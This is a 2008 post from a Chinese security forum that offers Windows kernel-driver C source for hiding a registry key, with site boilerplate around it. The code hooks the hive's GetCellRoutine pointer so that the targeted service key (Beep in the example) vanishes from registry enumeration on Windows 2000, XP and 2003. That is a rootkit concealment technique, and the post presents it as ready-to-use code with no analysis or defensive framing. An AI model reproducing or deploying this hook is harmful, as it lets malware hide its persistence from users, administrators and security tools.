为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

隐藏注册表项代码

2008-9-9 17:35| 投稿: security

摘要: #include <ntddk.h>#define GET_PTR(ptr, offset) ( *(PVOID*)( (ULONG)ptr + (offset##Offset) ) )#...
#include <ntddk.h>#define GET_PTR(ptr, offset) ( *(PVOID*)( (ULONG)ptr + (offset##Offset) ) )#define CM_KEY_INDEX_ROOT 0x6972 // ir#define CM_KEY_INDEX_LEAF 0x696c // il#define CM_KEY_FAST_LEAF 0x666c // fl#define CM_KEY_HASH_LEAF 0x686c // hl/*lkd> dt _HHIVEnt!_HHIVE+0x000 Signature : Uint4B+0x004 GetCellRoutine : Ptr32 _CELL_DATA*+0x008 ReleaseCellRoutine : Ptr32 void+0x00c Allocate : Ptr32 void*+0x010 Free : Ptr32 void+0x014 FileSetSize : Ptr32 unsigned char+0x018 FileWrite : Ptr32 unsigned char+0x01c FileRead : Ptr32 unsigned char+0x020 FileFlush : Ptr32 unsigned char+0x024 BaseBlock : Ptr32 _HBASE_BLOCK+0x028 DirtyVector : _RTL_BITMAP+0x030 DirtyCount : Uint4B+0x034 DirtyAlloc : Uint4B+0x038 RealWrites : UChar+0x03c Cluster : Uint4B+0x040 Flat : UChar+0x041 ReadOnly : UChar+0x042 Log : UChar+0x044 HiveFlags : Uint4B+0x048 LogSize : Uint4B+0x04c RefreshCount : Uint4B+0x050 StorageTypeCount : Uint4B+0x054 Version : Uint4B+0x058 Storage : [2] _DUALlkd> dt _CM_KEY_NODEnt!_CM_KEY_NODE+0x000 Signature : Uint2B+0x002 Flags : Uint2B+0x004 LastWriteTime : _LARGE_INTEGER+0x00c Spare : Uint4B+0x010 Parent : Uint4B+0x014 SubKeyCounts : [2] Uint4B+0x01c SubKeyLists : [2] Uint4B+0x024 ValueList : _CHILD_LIST+0x01c ChildHiveReference : _CM_KEY_REFERENCE+0x02c Security : Uint4B+0x030 Class : Uint4B+0x034 MaxNameLen : Uint4B+0x038 MaxClassLen : Uint4B+0x03c MaxValueNameLen : Uint4B+0x040 MaxValueDataLen : Uint4B+0x044 WorkVar : Uint4B+0x048 NameLength : Uint2B+0x04a ClassLength : Uint2B+0x04c Name : [1] Uint2B*/// 一些CM的数据结构,只列出用到的开头部分#pragma pack(1)typedef struct _CM_KEY_NODE {USHORT Signature;USHORT Flags;LARGE_INTEGER LastWriteTime;ULONG Spare; // used to be TitleIndexHANDLE Parent;ULONG SubKeyCounts[2]; // Stable and VolatileHANDLE SubKeyLists[2]; // Stable and Volatile// ...} CM_KEY_NODE, *PCM_KEY_NODE;typedef struct _CM_KEY_INDEX {USHORT Signature;USHORT Count;HANDLE List[1];} CM_KEY_INDEX, *PCM_KEY_INDEX;typedef struct _CM_KEY_BODY {ULONG Type; // "ky02"PVOID KeyControlBlock;PVOID NotifyBlock;PEPROCESS Process; // the owner processLIST_ENTRY KeyBodyList; // key_nodes using the same kcb} CM_KEY_BODY, *PCM_KEY_BODY;typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE);typedef struct _HHIVE {ULONG Signature;PGET_CELL_ROUTINE GetCellRoutine;PVOID ReleaseCellRoutine;// ...} HHIVE, *PHHIVE;#pragma pack()NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath);NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj);#ifdef ALLOC_PRAGMA#pragma alloc_text(INIT, DriverEntry)#pragma alloc_text(PAGE, DriverUnload)#endif // ALLOC_PRAGMA// 需隐藏的主键名WCHAR g_HideKeyName[] = L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Beep";PGET_CELL_ROUTINE g_pGetCellRoutine = NULL;PGET_CELL_ROUTINE* g_ppGetCellRoutine = NULL;PCM_KEY_NODE g_HideNode = NULL;PCM_KEY_NODE g_LastNode = NULL;// 打开指定名字的KeyHANDLE OpenKeyByName(PCWSTR pwcsKeyName){NTSTATUS status;UNICODE_STRING uKeyName;OBJECT_ATTRIBUTES oa;HANDLE hKey;RtlInitUnicodeString(&uKeyName, pwcsKeyName);InitializeObjectAttributes(&oa, &uKeyName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);status = ZwOpenKey(&hKey, KEY_READ, &oa);if (!NT_SUCCESS(status)){DbgPrint("ZwOpenKey Failed: %lx\n", status);return NULL;}return hKey;}// 获取指定Key句柄的KeyControlBlockPVOID GetKeyControlBlock(HANDLE hKey){NTSTATUS status;PCM_KEY_BODY KeyBody;PVOID KCB;if (hKey == NULL) return NULL;// 由Key句柄获取对象体status = ObReferenceObjectByHandle(hKey, KEY_READ, NULL, KernelMode, &KeyBody, NULL);if (!NT_SUCCESS(status)){DbgPrint("ObReferenceObjectByHandle Failed: %lx\n", status);return NULL;}// 对象体中含有KeyControlBlockKCB = KeyBody->KeyControlBlock;DbgPrint("KeyControlBlock = %lx\n", KCB);ObDereferenceObject(KeyBody);return KCB;}// 获取父键的最后一个子键的节点PVOID GetLastKeyNode(PVOID Hive, PCM_KEY_NODE Node){// 获取父键的节点PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, Node->Parent);// 获取子键的索引PCM_KEY_INDEX Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, ParentNode->SubKeyLists[0]);DbgPrint("ParentNode = %lx\nIndex = %lx\n", ParentNode, Index);// 如果为根(二级)索引,获取最后一个索引if (Index->Signature == CM_KEY_INDEX_ROOT){Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);DbgPrint("Index = %lx\n", Index);}if (Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF){// 快速叶索引(2k)或散列叶索引(XP/2k3),返回最后的节点return g_pGetCellRoutine(Hive, Index->List[2*(Index->Count-1)]);}else{// 一般叶索引,返回最后的节点return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);}}// GetCell例程的钩子函数PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell){// 调用原函数PVOID pRet = g_pGetCellRoutine(Hive, Cell);if (pRet){// 返回的是需要隐藏的节点if (pRet == g_HideNode){DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet);// 查询、保存并返回其父键的最后一个子键的节点pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode);DbgPrint("g_LastNode = %lx\n", g_LastNode);// 隐藏的正是最后一个节点,返回空值if (pRet == g_HideNode) pRet = NULL;}// 返回的是先前保存的最后一个节点else if (pRet == g_LastNode){DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet);// 清空保存值,并返回空值pRet = g_LastNode = NULL;}}return pRet;}NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj){DbgPrint("DriverUnload()\n");// 解除挂钩if (g_ppGetCellRoutine) *g_ppGetCellRoutine = g_pGetCellRoutine;return STATUS_SUCCESS;}NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath){ULONG BuildNumber;ULONG KeyHiveOffset; // KeyControlBlock->KeyHiveULONG KeyCellOffset; // KeyControlBlock->KeyCellHANDLE hKey;PVOID KCB;PVOID Hive;DbgPrint("DriverEntry()\n");pDrvObj->DriverUnload = DriverUnload;// 查询BuildNumberif (PsGetVersion(NULL, NULL, &BuildNumber, NULL)) return STATUS_NOT_SUPPORTED;DbgPrint("BuildNumber = %d\n", BuildNumber);// KeyControlBlock结构各版本略有不同// Cell的值一般小于0x80000000,而Hive正相反,以此来判断也可以switch (BuildNumber){case 2195: // Win2000KeyHiveOffset = 0xc;KeyCellOffset = 0x10;break;case 2600: // WinXPcase 3790: // Win2003KeyHiveOffset = 0x10;KeyCellOffset = 0x14;break;default:return STATUS_NOT_SUPPORTED;}// 打开需隐藏的键hKey = OpenKeyByName(g_HideKeyName);// 获取该键的KeyControlBlockKCB = GetKeyControlBlock(hKey);if (KCB){// 由KCB得到HivePHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive);// GetCellRoutine在KCB中,保存原地址g_ppGetCellRoutine = &Hive->GetCellRoutine;g_pGetCellRoutine = Hive->GetCellRoutine;DbgPrint("GetCellRoutine = %lx\n", g_pGetCellRoutine);// 获取需隐藏的节点并保存g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell));// 挂钩GetCell例程Hive->GetCellRoutine = MyGetCellRoutine;}ZwClose(hKey);return STATUS_SUCCESS;}

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部